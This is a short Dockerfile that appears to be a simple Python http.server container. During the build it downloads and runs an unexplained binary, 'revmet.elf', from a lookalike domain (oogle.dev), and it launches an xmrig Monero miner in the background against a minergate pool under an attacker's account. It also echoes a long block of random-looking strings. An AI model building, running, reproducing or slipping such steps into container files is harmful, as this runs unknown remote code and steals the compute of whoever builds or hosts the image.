FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo lGHbEc6f6IsCMRMsFxF7XpBYfj3pKA8a g4z3GiXkBXg4I1ceLkVKNXbLaeTvIAmF H0IZEnj9dUd5vQ02JVJqaKwRDSnADzLQ X9xaELQvbuZ5OCbJV9BgVYdd8LzGUfYQ hGLY5PZTRzfIOUnbNLlkeYFtVDeFEllq 98O814QCxBatH5OGd2vRCaoQkb8f5K1I zMf69sRtBCiuGrPdBnrPhMpd9RYQmji3 nLpzmZ1WG6eg1T7sYC6lEzrjdQyKbSaz SPpTu9qQZKhGG1zus2GUHdCYCLOEQgXm uYe2GpB3fnWfW0bpZHirtKV2GnHgItmR YUOs6H02XWviNPHdW5ZgIxkNw0mGCAGE lCJGCESo4J6LDks5cuRReQ9J0xBPLKfV DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]